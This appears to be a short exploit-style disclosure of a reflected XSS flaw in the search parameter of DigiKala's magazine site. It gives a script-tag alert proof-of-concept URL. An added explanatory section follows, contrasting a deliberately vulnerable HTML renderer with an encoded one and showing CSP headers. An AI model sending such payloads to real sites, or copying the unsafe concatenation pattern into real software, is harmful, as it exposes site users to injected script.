DigiKala of Iran suffers from a cross site scripting vulnerability.
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : DigiKala Of Iran XSS Vulnerability
[+]
[+] Exploit Author : 4TT4CK3R
[+]
[+] Tested on : Firefox , Windows
[+]
[+] Discovered by : 4TT4CK3R
[+]
[+] Category : WebApp
[+]
[+] HomePage : https://digikala.com
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] About DigiKala :
[+] DigiKala is the biggest store in Iran, now on the eve of its tenth year,
[+] with a diverse range of products for all walks of life and all ages !!
[+] This website now has an XSS vulnerability that will be patched soon !!
[+]
[+]
[+] Vulnerable address :
[+] https://mag.digikala.com/?s=
[+]
[+] When we search for a product, we can use this template.
[+] For example, I would like to search for 4TT4CK3R :
[+] https://mag.digikala.com/?s=4TT4CK3R
[+]
[+] Now we can use our script for vulnerability testing :
[+] http://mag.digikala.com/?s=<script>alert('4TT4CK3R')</script>
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploited by : 4TT4CK3R
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
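
The root cause described above is a search term reflected into the results page without output encoding. The following is an added example, not code from the advisory or from DigiKala: a hypothetical search-page renderer showing the vulnerable pattern beside the encoded one. The host `search.example`, the function names and the page markup are assumptions; only the `s` parameter and the test string come from the advisory.

```javascript
// Added example: hypothetical search-page renderer, not DigiKala's code.

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Read the search term from the request URL (parameter "s", as in the advisory).
function searchTerm(requestUrl) {
  return new URL(requestUrl).searchParams.get('s') ?? '';
}

// Vulnerable pattern: the decoded term is concatenated into markup as-is,
// so any markup in the query string becomes part of the page.
function renderUnsafe(requestUrl) {
  const term = searchTerm(requestUrl);
  return `<h1>Results for: ${term}</h1><input name="s" value="${term}">`;
}

// Hardened pattern: the term is encoded for the HTML context at output time,
// covering both the element body and the quoted attribute value.
function renderSafe(requestUrl) {
  const term = escapeHtml(searchTerm(requestUrl));
  return `<h1>Results for: ${term}</h1><input name="s" value="${term}">`;
}

// Defence in depth: a policy without 'unsafe-inline' stops inline script
// from running even if an encoding step is missed somewhere else.
const securityHeaders = {
  'Content-Type': 'text/html; charset=utf-8',
  'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
  'X-Content-Type-Options': 'nosniff',
};

// Constructed sample requests: assumed host, test string taken from the advisory.
const benignUrl = 'https://search.example/?s=4TT4CK3R';
const testUrl = "https://search.example/?s=<script>alert('4TT4CK3R')</script>";

console.log(renderUnsafe(testUrl)); // markup from the query reaches the page
console.log(renderSafe(testUrl));   // same input rendered as inert text
console.log(securityHeaders['Content-Security-Policy']);
```

Encoding at output time, in the context where the value lands, is the fix; the response headers only limit the damage when an encoding step is missed.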